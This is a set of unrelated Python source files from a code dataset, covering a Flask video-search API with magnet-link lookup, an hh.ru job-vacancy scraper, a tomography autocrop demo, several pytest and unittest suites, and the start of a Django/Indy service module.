    back to the SPA index so client-side routing keeps working."""
    if os.path.exists(web_dist_path + "/" + path):
        return send_from_directory(web_dist_path, path)
    return render_template("index.html")
@app.route("/search_by_code", methods=["POST"])
def search_by_code():
    """Look up a single video by its code.

    Responds with {"videos": [video], "other": null}, or an empty body when
    the code is missing or nothing is found.
    """
    params = json.loads(request.data.decode("utf-8"))
    print(params)
    if not params["code"]:
        rsp = make_response("")
    else:
        try:
            payload = {"videos": [Functions.search_by_code(params["code"]).to_dict()],
                       "other": None}
            rsp = jsonify(payload)
        except AttributeError:
            # search_by_code returned None -> .to_dict() failed.
            rsp = make_response("")
    rsp.headers["Access-Control-Allow-Origin"] = "*"
    return rsp
@app.route("/search_by_actress", methods=["POST"])
def search_by_actress():
    """Search videos by actress name, optionally resolving her past names."""
    params = json.loads(request.data.decode("utf-8"))
    print(params)
    actress = params["actress"]
    history_name = params["history_name"] == "true"
    briefs, names = spawn(Functions.search_by_actress, actress, None,
                          history_name).wait_for_result()
    payload = {
        "videos": [brief.to_dict() for brief in briefs],
        "other": {"history_names": names},
    }
    rsp = jsonify(payload)
    rsp.headers["Access-Control-Allow-Origin"] = "*"
    return rsp
@app.route("/new", methods=["POST"])
def new():
    """Return newly released videos, selected by 'up_to' count, 'page'
    number, or a default of the 30 most recent."""
    params = json.loads(request.data.decode("utf-8"))
    print(params)
    if "up_to" in params:
        briefs = Functions.get_newly_released(params["up_to"], False)
    elif "page" in params:
        briefs = Functions.get_newly_released(False, params["page"])
    else:
        briefs = Functions.get_newly_released(30, False)
    payload = [brief.to_dict() for brief in briefs] if briefs else briefs
    rsp = jsonify(payload)
    rsp.headers["Access-Control-Allow-Origin"] = "*"
    return rsp
@app.route("/search_magnet_by_code", methods=["POST"])
def search_magnet_by_code():
    """Return magnet links for a video code (empty list when no code given)."""
    params = json.loads(request.data.decode("utf-8"))
    print(params)
    magnets = Functions.get_magnet(params["code"]) if params["code"] else []
    payload = [m.to_dict() for m in magnets] if magnets else magnets
    rsp = jsonify(payload)
    rsp.headers["Access-Control-Allow-Origin"] = "*"
    return rsp
@app.route("/get_tags", methods=["POST"])
def get_tags():
    """Return the list of known tags."""
    params = json.loads(request.data.decode("utf-8"))
    print(params)
    rsp = jsonify(Functions.get_tags())
    rsp.headers["Access-Control-Allow-Origin"] = "*"
    return rsp
@app.route("/actress_info", methods=["POST"])
def actress_info():
    """Return profile information for one actress."""
    params = json.loads(request.data.decode("utf-8"))
    print(params)
    info = Functions.get_actress_info(params["actress"])
    rsp = jsonify(info.to_dict())
    print(info)
    rsp.headers["Access-Control-Allow-Origin"] = "*"
    return rsp
68191 | <reponame>dkazanc/flatsmatch
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 26 2020
Demo to show the capability of autocropping function.
It works to crop 2D projedctions as well as full 3D volumes.
@author: <NAME>
"""
import numpy as np
import matplotlib.pyplot as plt
from larix.methods.misc import AUTOCROP
# Load the 2D projection data (i23 beamline, DLS)
sample_data = np.load('../data/data2D_to_crop.npy')

# Show the uncropped projection for reference.
plt.figure(1)
plt.imshow(sample_data, vmin=0, vmax=1.5, cmap="gray")
plt.title('2D tomographic projection')
plt.show()

print("Runnning autocropping in 2D...")
pars = {'input_data' : sample_data, # input grayscale image
        'threshold' : 0.05, # threshold to control cropping strength
        'margin_skip' : 10, # skip number of pixels around the image border
        'statbox_size' : 20, # the size of the box to collect background statistics (mean)
        'increase_crop' : 20} # increase crop values to ensure better cropping

cropped_indices = AUTOCROP(pars['input_data'], pars['threshold'],\
                           pars['margin_skip'], pars['statbox_size'],\
                           pars['increase_crop'])

# NOTE(review): the returned indices appear to be ordered [x0, x1, y0, y1]:
# rows are sliced with [2]:[3] and columns with [0]:[1] -- confirm against
# the larix AUTOCROP documentation.
cropped_im = sample_data[int(cropped_indices[2]):int(cropped_indices[3]),int(cropped_indices[0]):int(cropped_indices[1])]

# Show the cropped result.
plt.figure(2)
plt.imshow(cropped_im, vmin=0, vmax=1.5, cmap="gray")
plt.title('cropped 2D projection')
plt.show()
#%% | StarcoderdataPython |
63078 | import datetime
import logging
import random
import re
import time
from typing import Iterator, List, Union, Dict
from urllib.parse import quote
import pandas as pd
import requests
from bs4 import BeautifulSoup
from .conn_postgresql import ConnPostgreSQL
log = logging.getLogger(__name__)
class HhParser:
"""Парсер hh.ru."""
def __init__(self, area: int, search_period: int, search_text: str, search_regex: str) -> None:
    """
    :param area: Search region code (1 = Moscow)
    :param search_period: Search period, in days
    :param search_text: Search query
    :param search_regex: Specifying regex applied to vacancy titles
    """
    self.__area = area
    self.__search_period = search_period
    self.__search_text = search_text
    self.__search_regex = search_regex
    self.__base_url = 'https://hh.ru/search/vacancy'
    # Query-string parameters for the vacancy search; 'page' is advanced
    # while iterating result pages. The search text is URL-quoted here.
    self.__url_params = {
        'search_period': self.__search_period,
        'clusters': 'true',
        'area': self.__area,
        'text': quote(self.__search_text),
        'enable_snippets': 'true',
        'page': 0
    }
    # Reused HTTP session with a desktop browser user-agent.
    self.__session = requests.Session()
    self.__headers = {
        'accept': '*/*',
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
                      'Chrome/76.0.3809.100 Safari/537.36'
    }
# Read-only accessors for the search configuration.
area = property(lambda self: self.__area)
search_period = property(lambda self: self.__search_period)
search_text = property(lambda self: self.__search_text)
search_regex = property(lambda self: self.__search_regex)
class HhParserResults:
    """Container for hh.ru parsing results."""

    def __init__(self, data: pd.DataFrame) -> None:
        """
        :param data: Parsed vacancies (date, title, salary, company, href)
        """
        self.__data = data
        # Filled in by HhParser.run() after parsing:
        self.area = None
        self.search_period = None
        self.search_text = None
        self.search_regex = None
        self.parse_duration = None
        # Filled in by downstream post-processing:
        self.df_parsing_results = None
        self.df_current_jobs = None
        self.df_unique_jobs = None
        self.df_unique_closed_jobs = None

    data = property(lambda self: self.__data)
@staticmethod
def _get_url_with_params(url: str, params: dict) -> str:
    """Build *url* with a query string assembled from *params*.

    Values are joined as-is (no URL escaping here); the search text is
    already quoted when the params dict is built.
    """
    query = '&'.join(f'{key}={value}' for key, value in params.items())
    return f'{url}?{query}'
def _get_urls_pages_with_vacancies(self) -> Iterator[str]:
    """Yield the URL of every result page for the configured search.

    Fetches the first page, reads the pager to learn the page count and
    yields one URL per page (the 'page' parameter counts from 0).

    :raises RuntimeError: when the initial request keeps failing
    """
    start_url = self._get_url_with_params(self.__base_url, self.__url_params)
    urls = [start_url]
    response = self.__exponential_backoff(start_url)
    if response is False:
        log.error(f'Start request failed')
        raise RuntimeError('Request failed')
    result = BeautifulSoup(response.content, 'lxml')
    pages = result.find_all('a', attrs={'data-qa': 'pager-page'})
    # FIX: when all results fit on a single page there are no pager links
    # at all; the previous version raised IndexError on pages[-1].
    page_count = int(pages[-1].text) if pages else 1
    url_params = self.__url_params
    for i in range(page_count - 1):
        url_params['page'] = i + 1
        urls.append(self._get_url_with_params(self.__base_url, url_params))
    log.info(f'Found {len(urls)} pages with "{self.__search_text}" vacancies')
    yield from urls
def run(self) -> HhParserResults:
    """Run the parser: walk every result page and collect vacancies.

    :return: HhParserResults with a DataFrame sorted by date, newest first
    :raises RuntimeError: when a page request fails or nothing matched
    """
    time_start = time.monotonic()
    log.info(f'Looking for "{self.__search_text}" vacancies on hh.ru...')
    vacancies_pages_urls = self._get_urls_pages_with_vacancies()
    raw_vacancies_data = []
    url_counter = 1
    for url in vacancies_pages_urls:
        log.info(f'Parsing page {url_counter}...')
        response = self.__exponential_backoff(url)
        if response is not False:
            result = BeautifulSoup(response.content, 'lxml')
            # Regular and premium vacancies live in differently-tagged divs.
            vacancies_divs = result.find_all('div', attrs={
                'data-qa': 'vacancy-serp__vacancy'
            })
            premium_vacancies_divs = result.find_all('div', attrs={
                'data-qa': 'vacancy-serp__vacancy vacancy-serp__vacancy_premium'
            })
            vacancies_data = self._get_data_from_divs(vacancies_divs)
            premium_vacancies_data = self._get_data_from_divs(premium_vacancies_divs)
            raw_vacancies_data += vacancies_data + premium_vacancies_data
        else:
            log.error(f'Request failed')
            raise RuntimeError('Request failed')
        url_counter += 1
    df = pd.DataFrame(raw_vacancies_data)
    if len(df) == 0:
        log.error(f'No results found for settings: area={self.__area}, period={self.__search_period}, '
                  f'text={self.__search_text}, specifying_regex={self.__search_regex}')
        raise RuntimeError('No results found')
    # Dates were produced as DD.MM.YYYY strings -> parse day-first.
    df['date'] = pd.to_datetime(df['date'], dayfirst=True)
    df = df[['date', 'title', 'salary', 'company', 'href']].sort_values(by='date', ascending=False)
    parse_duration = round(time.monotonic() - time_start, 2)
    log.info(f'Found {len(df)} vacancies in {parse_duration} seconds')
    # Attach the search settings so downstream reports can reference them.
    results = self.HhParserResults(df)
    results.parse_duration = parse_duration
    results.area = self.__area
    results.search_period = self.__search_period
    results.search_text = self.__search_text
    results.search_regex = self.__search_regex
    return results
def _vacancy_name_check(self, title: str) -> bool:
    """Return True when *title* matches the specifying regex
    (case-insensitive substring search)."""
    return re.search(self.__search_regex, title, flags=re.IGNORECASE) is not None
@staticmethod
def _process_date(raw_date: str) -> str:
    """Convert a date like '5 марта' into 'DD.MM.YYYY'.

    hh.ru omits the year, so the current year is assumed; if that would
    put the date in the future, the previous year is used instead.
    """
    months = {
        'января': '01', 'февраля': '02', 'марта': '03', 'апреля': '04',
        'мая': '05', 'июня': '06', 'июля': '07', 'августа': '08',
        'сентября': '09', 'октября': '10', 'ноября': '11', 'декабря': '12',
    }
    # Replace month names with their numbers; leave other tokens as-is.
    parts = [months.get(token, token) for token in raw_date.split(' ')]
    # Append the assumed year.
    parts.append(str(datetime.datetime.now().year))
    if datetime.datetime.strptime('.'.join(parts), '%d.%m.%Y') > datetime.datetime.now():
        parts[-1] = str(datetime.datetime.now().year - 1)
    return '.'.join(parts)
def _get_data_from_divs(self, divs: List) -> List[dict]:
    """Extract vacancy fields from result-page vacancy <div> blocks.

    :param divs: bs4 tags, one per vacancy
    :return: dicts with title/company/salary/date/href, keeping only
        titles that match the specifying regex
    """
    results = []
    for div in divs:
        title = div.find('a', attrs={'data-qa': 'vacancy-serp__vacancy-title'}).text
        # Skip vacancies whose title fails the specifying regex.
        if not self._vacancy_name_check(title):
            continue
        company_data = div.find('a', attrs={'data-qa': 'vacancy-serp__vacancy-employer'})
        company = company_data.text if company_data else 'Не определено'
        href = div.find('a', attrs={'data-qa': 'vacancy-serp__vacancy-title'}).get('href')
        # '\xa0' is the non-breaking space hh.ru renders inside dates.
        date = self._process_date(
            div.find('span', attrs={'class': 'vacancy-serp-item__publication-date'}).text.replace('\xa0', ' ')
        )
        salary_data = div.find('span', attrs={'data-qa': 'vacancy-serp__vacancy-compensation'})
        salary = salary_data.text.replace('\xa0', '') if salary_data else 'Не указано'
        results.append({'title': title, 'company': company, 'salary': salary, 'date': date, 'href': href})
    return results
def __exponential_backoff(self, url: str) -> Union[requests.Response, bool]:
    """GET *url*, retrying up to 5 times on 403/500/503 with exponential
    backoff plus jitter.

    :param url: request URL
    :return: the response on HTTP 200, False on any other failure
    """
    retryable = (403, 500, 503)
    for attempt in range(5):
        log.debug(f'GET request to URL {url}')
        response = self.__session.get(url, headers=self.__headers)
        if response.status_code == 200:
            return response
        if response.status_code in retryable:
            log.debug(f'HTTP error: {response.status_code}. Trying again. Attempt {attempt + 1}')
            time.sleep((2 ** attempt) + random.random())
        else:
            log.error(f'HTTP error {response.status_code} during requesting URL: {url}')
            return False
    log.error(f'Failed request URL {url} in 5 attempts')
    return False
class HhParserResultsProcessor:
    """Post-process HH parsing results into DataFrames for Postgres tables."""

    def __init__(self, hh_parsed_data: HhParser.HhParserResults, pg_conn=ConnPostgreSQL) -> None:
        """
        :param hh_parsed_data: parsing results
        :param pg_conn: active PostgreSQL connection
        """
        self.__hh_parsed_data = hh_parsed_data
        self.__df = hh_parsed_data.data
        self.__parsing_duration = hh_parsed_data.parse_duration
        self.__pg_conn = pg_conn

    hh_parsed_data = property(lambda self: self.__hh_parsed_data)
    # NOTE(review): __report_folder is never assigned in this class, so
    # reading this property raises AttributeError — confirm where it is set.
    report_folder = property(lambda self: self.__report_folder)

    def run(self) -> HhParser.HhParserResults:
        """Run processing of parsing results and return the enriched object."""
        self._get_parsing_results_df()
        self._get_current_jobs_df()
        self._get_unique_jobs_df()
        self._get_unique_closed_jobs_df()
        return self.__hh_parsed_data

    def _find_jobs_without_salary(self) -> Dict[str, Union[int, float]]:
        """Compute the percentage of vacancies without a stated salary."""
        unknown_salary_count = self.__df.loc[self.__df['salary'] == 'Не указано']['salary'].count()
        unknown_salary_percent = round((unknown_salary_count / len(self.__df)) * 100, 2)
        log.info(f'Jobs without salary: {unknown_salary_percent}%')
        return {'jobs_without_salary': unknown_salary_percent}

    def _find_salary_mean_and_median(self) -> Dict[str, Union[int, float]]:
        """Compute median, mean, mean-maximum and mean-minimum salaries."""
        salaries_min = []
        salaries_max = []
        for i in range(len(self.__df)):
            # Lower bound given ("от" = "from")
            if self.__df.loc[i, 'salary'].split()[0] == 'от':
                salaries_min.append(int(self.__df.loc[i, 'salary'].split()[1]))
            # Upper bound given ("до" = "up to")
            elif self.__df.loc[i, 'salary'].split()[0] == 'до':
                salaries_max.append(int(self.__df.loc[i, 'salary'].split()[1]))
            # Salary range given ("min-max")
            elif len(self.__df.loc[i, 'salary'].split()[0].split('-')) == 2:
                fork = self.__df.loc[i, 'salary'].split()[0].split('-')
                salaries_min.append(int(fork[0]))
                salaries_max.append(int(fork[1]))
            # No salary specified
            elif self.__df.loc[i, 'salary'] == 'Не указано':
                pass
            # Fixed salary: counts as both min and max
            else:
                salaries_min.append(int(self.__df.loc[i, 'salary'].split()[0]))
                salaries_max.append(int(self.__df.loc[i, 'salary'].split()[0]))
        salaries_all = salaries_min + salaries_max
        salary_mean = round(pd.Series(salaries_all).mean())
        salary_median = round(pd.Series(salaries_all).median())
        min_salary_mean = round(pd.Series(salaries_min).mean())
        max_salary_mean = round(pd.Series(salaries_max).mean())
        log.info(f'Mean salary: {salary_mean}, median salary: {salary_median}, mean min salary: {min_salary_mean}, '
                 f'mean max salary: {max_salary_mean}')
        return {'salary_mean': salary_mean,
                'salary_median': salary_median,
                'min_salary_mean': min_salary_mean,
                'max_salary_mean': max_salary_mean}

    def _get_parsing_results_df(self) -> None:
        """Build the DataFrame for the "parsing_results" table."""
        data_for_update = {}
        data_for_update.update(self._find_jobs_without_salary())
        data_for_update.update(self._find_salary_mean_and_median())
        data_for_update.update({'jobs_count': len(self.__df),
                                'date': datetime.datetime.now().strftime("%Y-%m-%d"),
                                'time_parse': self.__parsing_duration})
        df = pd.DataFrame([data_for_update])
        df['date'] = pd.to_datetime(df['date'])
        self.__hh_parsed_data.df_parsing_results = df
        # Fix: dropped the f-prefix — the message has no placeholders.
        log.info('DataFrame for "parsing_results" table generated')

    def _get_current_jobs_df(self) -> None:
        """Build the DataFrame for the "current_jobs" table."""
        min_salary = []
        max_salary = []
        df = self.__df.copy().reset_index(drop=True)
        for i in range(len(df)):
            # Lower bound given ("от" = "from"): used as both min and max
            if df.loc[i, 'salary'].split()[0] == 'от':
                min_salary.append(int(df.loc[i, 'salary'].split()[1]))
                max_salary.append(int(df.loc[i, 'salary'].split()[1]))
            # Upper bound given ("до" = "up to"): min defaults to 0
            elif df.loc[i, 'salary'].split()[0] == 'до':
                min_salary.append(0)
                max_salary.append(int(df.loc[i, 'salary'].split()[1]))
            # Salary range given ("min-max")
            elif len(df.loc[i, 'salary'].split()[0].split('-')) == 2:
                fork = df.loc[i, 'salary'].split()[0].split('-')
                min_salary.append(int(fork[0]))
                max_salary.append(int(fork[1]))
            # No salary specified
            elif df.loc[i, 'salary'] == 'Не указано':
                min_salary.append(0)
                max_salary.append(0)
            # Fixed salary: counts as both min and max
            else:
                min_salary.append(int(df.loc[i, 'salary'].split()[0]))
                max_salary.append(int(df.loc[i, 'salary'].split()[0]))
        df['min_salary'] = min_salary
        df['max_salary'] = max_salary
        df['mean_salary'] = (df['min_salary'] + df['max_salary']) / 2
        # Best-paid vacancies first.
        df = df.sort_values(['mean_salary', 'max_salary', 'min_salary'], ascending=False).reset_index(drop=True)
        df['row'] = list(range(1, len(df) + 1))
        self.__hh_parsed_data.df_current_jobs = df[['row', 'date', 'title', 'company', 'salary', 'href']]
        log.info('DataFrame for "current_jobs" table generated')

    def _get_unique_jobs_merged_df(self) -> pd.DataFrame:
        """Outer-join unique jobs from Postgres with the current parse (on href).

        After the merge, 'date_x' comes from Postgres and 'date_y' from the
        current parsing run.
        """
        pg_unique_jobs_raw = self.__pg_conn.get_table(table_name='unique_jobs')
        pg_unique_jobs = self._get_df_from_pgtable(pg_unique_jobs_raw)
        if pg_unique_jobs is None or pg_unique_jobs.empty:
            pg_unique_jobs = pd.DataFrame.from_dict({'date': [], 'href': []})
        pg_unique_jobs['date'] = pd.to_datetime(pg_unique_jobs['date'])
        pg_unique_jobs['href'] = pg_unique_jobs['href'].astype(str)
        r = pd.merge(pg_unique_jobs, self.__df[['date', 'href']], on='href', how='outer')
        return r

    @staticmethod
    def _get_df_from_pgtable(pg_table: ConnPostgreSQL.PgTable) -> Union[pd.DataFrame, None]:
        """Build a DataFrame from a PgTable.

        :param pg_table: Postgres table wrapper
        :return: a DataFrame when there is data, otherwise None
        """
        if not pg_table:
            return None
        # Fix: DataFrame.append() was deprecated in pandas 1.4 and removed
        # in pandas 2.0 — concatenate all chunks in one pd.concat call.
        frames = list(pg_table.table_data)
        if not frames:
            return pd.DataFrame()
        return pd.concat(frames)

    def _get_unique_jobs_df(self) -> None:
        """Build the DataFrame for the "unique_jobs" table."""
        df_merged = self._get_unique_jobs_merged_df()
        # Rows with no Postgres date are jobs first seen in this parse.
        df_merged = df_merged[pd.isnull(df_merged['date_x'])][['date_y', 'href']].reset_index(drop=True)
        df_merged.columns = ['date', 'href']
        self.__hh_parsed_data.df_unique_jobs = df_merged
        log.info('DataFrame for "unique_jobs" table generated')

    def _get_unique_closed_jobs_df(self) -> None:
        """Build the DataFrame for the "unique_closed_jobs" table."""
        df_merged = self._get_unique_jobs_merged_df()
        # Rows with no date from the current parse are jobs that closed.
        df_merged = df_merged[pd.isnull(df_merged['date_y'])].reset_index(drop=True)
        df_merged.columns = ['publication_date', 'href', 'closing_date']
        df_merged['closing_date'] = datetime.datetime.now().strftime("%Y-%m-%d")
        df_merged['href'] = df_merged['href'].astype(str)
        df_merged['closing_date'] = pd.to_datetime(df_merged['closing_date'])
        df_merged['publication_date'] = pd.to_datetime(df_merged['publication_date'])
        df_merged['date_diff'] = (df_merged['closing_date'] - df_merged['publication_date']).dt.days.astype(int)
        pg_unique_closed_jobs_raw = self.__pg_conn.get_table(table_name='unique_closed_jobs')
        pg_unique_closed_jobs = self._get_df_from_pgtable(pg_unique_closed_jobs_raw)
        if pg_unique_closed_jobs is None or pg_unique_closed_jobs.empty:
            # Fix: from_dict is a classmethod — call it on the class, not on
            # a throwaway instance (pd.DataFrame().from_dict(...)).
            pg_unique_closed_jobs = pd.DataFrame.from_dict({
                'href': [],
                'publication_date': [],
                'closing_date': [],
                'date_diff': []
            })
        pg_unique_closed_jobs['closing_date'] = pd.to_datetime(pg_unique_closed_jobs['closing_date'])
        pg_unique_closed_jobs['publication_date'] = pd.to_datetime(pg_unique_closed_jobs['publication_date'])
        pg_unique_closed_jobs['date_diff'] = pg_unique_closed_jobs['date_diff'].astype(int)
        pg_unique_closed_jobs['href'] = pg_unique_closed_jobs['href'].astype(str)
        df_merged_closed_jobs = pd.merge(pg_unique_closed_jobs, df_merged, on='href', how='outer')
        # Keep only rows not already recorded as closed in Postgres.
        df_merged_closed_jobs = df_merged_closed_jobs[pd.isnull(df_merged_closed_jobs['closing_date_x'])]
        df_merged_closed_jobs = df_merged_closed_jobs[['href', 'publication_date_y', 'closing_date_y', 'date_diff_y']]\
            .reset_index(drop=True)
        df_merged_closed_jobs.columns = ['href', 'publication_date', 'closing_date', 'date_diff']
        df_merged_closed_jobs['date_diff'] = df_merged_closed_jobs['date_diff'].astype(int)
        self.__hh_parsed_data.df_unique_closed_jobs = df_merged_closed_jobs
        log.info('DataFrame for "unique_closed_jobs" table generated')
| StarcoderdataPython |
63139 | from pymapper.layer import LayerType, GeoPandasLayer
def test_layer_types():
    """The LayerType enum must expose exactly the GeoPandas layer type."""
    member_names = list(LayerType.__members__.keys())
    assert member_names == [GeoPandasLayer.LAYER_TYPE]
    assert LayerType[GeoPandasLayer.LAYER_TYPE].value == GeoPandasLayer
| StarcoderdataPython |
3352196 | <reponame>cbeach/nes_le
from .super_mario_bros import *
| StarcoderdataPython |
137211 | <reponame>doraskayo/buildstream
# Pylint doesn't play well with fixtures and dependency injection from pytest
# pylint: disable=redefined-outer-name
import os
import pytest
from buildstream import _yaml
from buildstream.exceptions import ErrorDomain, LoadErrorReason
from buildstream.testing.runcli import cli # pylint: disable=unused-import
# Project directory: test data is located alongside this test module.
DATA_DIR = os.path.dirname(os.path.realpath(__file__))
@pytest.mark.datafiles(DATA_DIR)
@pytest.mark.parametrize(
    "target,option,value,expected",
    [
        # Test (var == [ "foo" ]) syntax
        ("element.bst", "farm", "pony", "a pony"),
        ("element.bst", "farm", "zebry", "a zebry"),
        ("element.bst", "farm", "pony, horsy", "a pony and a horsy"),
        ("element.bst", "farm", "zebry,horsy , pony", "all the animals"),
        # Test ("literal" in var) syntax
        ("element-in.bst", "farm", "zebry, horsy, pony", "a zebry"),
        # Test ("literal" not in var) syntax
        ("element-in.bst", "farm", "zebry, horsy", "no pony"),
        # Test (var1 not in var2) syntax (where var1 is enum and var2 is flags)
        ("element-in.bst", "farm", "zebry, pony", "no horsy"),
    ],
)
def test_conditional_cli(cli, datafiles, target, option, value, expected):
    """Flag-option conditionals must resolve when the option is set on the CLI."""
    project_dir = os.path.join(datafiles.dirname, datafiles.basename, "option-flags")
    show_args = ["--option", option, value, "show", "--deps", "none", "--format", "%{vars}", target]
    result = cli.run(project=project_dir, silent=True, args=show_args)
    result.assert_success()
    parsed = _yaml.load_data(result.output)
    assert parsed.get_str("result") == expected
@pytest.mark.datafiles(DATA_DIR)
@pytest.mark.parametrize(
    "target,option,value,expected",
    [
        # Test 'var == [ "foo" ]' syntax
        ("element.bst", "farm", ["pony"], "a pony"),
        ("element.bst", "farm", ["zebry"], "a zebry"),
        ("element.bst", "farm", ["pony", "horsy"], "a pony and a horsy"),
        ("element.bst", "farm", ["zebry", "horsy", "pony"], "all the animals"),
    ],
)
def test_conditional_config(cli, datafiles, target, option, value, expected):
    """Flag-option conditionals must resolve when the option comes from user config."""
    project_dir = os.path.join(datafiles.dirname, datafiles.basename, "option-flags")
    cli.configure({"projects": {"test": {"options": {option: value}}}})
    show_args = ["show", "--deps", "none", "--format", "%{vars}", target]
    result = cli.run(project=project_dir, silent=True, args=show_args)
    result.assert_success()
    parsed = _yaml.load_data(result.output)
    assert parsed.get_str("result") == expected
@pytest.mark.datafiles(DATA_DIR)
@pytest.mark.parametrize(
    "cli_option",
    [("giraffy"), ("horsy pony")],  # Not a valid animal for the farm option # Does not include comma separators
)
def test_invalid_value_cli(cli, datafiles, cli_option):
    """Invalid flag-option values given on the CLI must fail to load."""
    project_dir = os.path.join(datafiles.dirname, datafiles.basename, "option-flags")
    show_args = ["--option", "farm", cli_option, "show", "--deps", "none", "--format", "%{vars}", "element.bst"]
    result = cli.run(project=project_dir, silent=True, args=show_args)
    result.assert_main_error(ErrorDomain.LOAD, LoadErrorReason.INVALID_DATA)
@pytest.mark.datafiles(DATA_DIR)
@pytest.mark.parametrize(
    "config_option",
    [
        ("pony"),  # Not specified as a list
        (["horsy", "pony", "giraffy"]),  # Invalid giraffy animal for farm option
        ({"dic": "tionary"}),  # Dicts also dont make sense in the config for flags
    ],
)
def test_invalid_value_config(cli, datafiles, config_option):
    """Invalid flag-option values in user config must fail to load."""
    project_dir = os.path.join(datafiles.dirname, datafiles.basename, "option-flags")
    cli.configure({"projects": {"test": {"options": {"farm": config_option}}}})
    show_args = ["show", "--deps", "none", "--format", "%{vars}", "element.bst"]
    result = cli.run(project=project_dir, silent=True, args=show_args)
    result.assert_main_error(ErrorDomain.LOAD, LoadErrorReason.INVALID_DATA)
@pytest.mark.datafiles(DATA_DIR)
def test_missing_values(cli, datafiles):
    """A flag option declared without values must be rejected at load time."""
    project_dir = os.path.join(datafiles.dirname, datafiles.basename, "option-flags-missing")
    show_args = ["show", "--deps", "none", "--format", "%{vars}", "element.bst"]
    result = cli.run(project=project_dir, silent=True, args=show_args)
    result.assert_main_error(ErrorDomain.LOAD, LoadErrorReason.INVALID_DATA)
| StarcoderdataPython |
24519 | <filename>test1.py
print("hello")
# Intentional infinite loop: this script is a test artifact that never exits.
while True:
    print("Infinite loop")
| StarcoderdataPython |
8822 | from oacensus.scraper import Scraper
from oacensus.commands import defaults
class TestScraper(Scraper):
    """
    Scraper for testing scraper methods.
    """
    # Registered alias used by Scraper.create_instance in the tests below.
    aliases = ['testscraper']

    def scrape(self):
        # No-op stub: only the base Scraper machinery is under test.
        pass

    def process(self):
        # No-op stub: result processing is not under test.
        pass
def test_hashcode():
    """A scraper's hashcode must be a 32-character digest."""
    scraper = Scraper.create_instance('testscraper', defaults)
    digest = scraper.hashcode()
    assert len(digest) == 32
def test_run():
    """Running the stub scraper must complete without raising."""
    Scraper.create_instance('testscraper', defaults).run()
| StarcoderdataPython |
1630552 | import unittest
from oeqa.oetest import oeRuntimeTest, skipModule
from oeqa.utils.decorators import *
def setUpModule():
    """Skip the whole module unless DEFAULTTUNE selects x86-64-x32."""
    # check if DEFAULTTUNE is set and its value is: x86-64-x32
    tune = oeRuntimeTest.tc.d.getVar("DEFAULTTUNE", True)
    if "x86-64-x32" in tune:
        return
    skipModule("DEFAULTTUNE is not set to x86-64-x32")
class X32libTest(oeRuntimeTest):
    """Runtime checks that the target image is built as x32."""

    @testcase(281)
    @skipUnlessPassed("test_ssh")
    def test_x32_file(self):
        """/bin/ls must be an ELF32-class binary for the X86-64 machine."""
        class_status = self.target.run("readelf -h /bin/ls | grep Class | grep ELF32")[0]
        machine_status = self.target.run("readelf -h /bin/ls | grep Machine | grep X86-64")[0]
        readelf_output = self.target.run("readelf -h /bin/ls")[1]
        self.assertTrue(class_status == 0 and machine_status == 0,
                        msg="/bin/ls isn't an X86-64 ELF32 binary. readelf says: %s" % readelf_output)
| StarcoderdataPython |
171278 | <reponame>seiferma/Docker_YoutubeDLService
from __future__ import unicode_literals
import cherrypy
from .YoutubeVideos import YoutubeVideos
class Youtube(object):
    """CherryPy node exposing YouTube video handlers."""

    def __init__(self):
        # Child handler that serves per-video requests.
        self.video = YoutubeVideos()

    def _cp_dispatch(self, vpath):
        """Custom CherryPy dispatch: route video paths to the video handler.

        NOTE(review): ``vpath.pop()`` takes the *last* path segment while
        the video id is then taken from the front with ``vpath.pop(0)``;
        for a path like ``video/123`` the popped segment is ``123``, not
        ``video``, so the branch may never match. Confirm the intended URL
        layout (possibly ``<id>/video``) or whether ``pop(0)`` was meant.
        """
        if len(vpath) > 1:
            subelement = vpath.pop()
            if subelement == 'video':
                cherrypy.request.params['videoid'] = vpath.pop(0)
                return self.video
            return self
        return vpath
| StarcoderdataPython |
3328229 | #
# Copyright 2017-2018 Government of Canada
# Public Services and Procurement Canada - buyandsell.gc.ca
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Importing this file causes the standard settings to be loaded
and a standard service manager to be created. This allows services
to be properly initialized before the webserver process has forked.
"""
import asyncio
import logging
import os
import platform
from django.conf import settings
import django.db
from wsgi import application
from vonx.common.eventloop import run_coro
from vonx.indy.manager import IndyManager
from .config import (
indy_general_wallet_config,
indy_wallet_config,
)
# Module logger.
LOGGER = logging.getLogger(__name__)
# Flipped to True once the Indy manager has been started (see start_indy_manager).
STARTED = False
def get_genesis_path():
    """Resolve the Indy genesis transaction file path.

    Defaults to ./genesis (realpath) on Windows and /home/indy/genesis
    elsewhere; the INDY_GENESIS_PATH environment variable overrides both.
    """
    if platform.system() == "Windows":
        default_path = os.path.realpath("./genesis")
    else:
        default_path = "/home/indy/genesis"
    return os.getenv("INDY_GENESIS_PATH", default_path)
def indy_client():
    """Return the shared Indy client; fail fast if the service never started."""
    if STARTED:
        return MANAGER.get_client()
    raise RuntimeError("Indy service is not running")
def indy_env():
    """Collect the environment settings handed to the Indy manager."""
    env = os.environ.get
    return {
        "INDY_GENESIS_PATH": get_genesis_path(),
        "INDY_LEDGER_URL": env("LEDGER_URL"),
        "INDY_GENESIS_URL": env("GENESIS_URL"),
        "LEDGER_PROTOCOL_VERSION": env("LEDGER_PROTOCOL_VERSION"),
    }
def indy_holder_id():
    """Return the configured Indy holder identifier from Django settings."""
    return settings.INDY_HOLDER_ID
async def add_server_headers(request, response):
    """Tag the response with an ``X-Served-By`` header naming this host.

    Does nothing when HOSTNAME is unset, and never overwrites a header
    that is already present.
    """
    served_by = os.environ.get("HOSTNAME")
    if not served_by:
        return
    response.headers.setdefault("X-Served-By", served_by)
async def init_app(on_startup=None, on_cleanup=None):
    """Build the aiohttp application that wraps the Django WSGI app.

    :param on_startup: optional aiohttp startup callback
    :param on_cleanup: optional aiohttp cleanup callback
    :return: the configured aiohttp Application
    """
    from aiohttp.web import Application
    from aiohttp_wsgi import WSGIHandler
    from api_indy.tob_anchor.processor import CredentialProcessorQueue
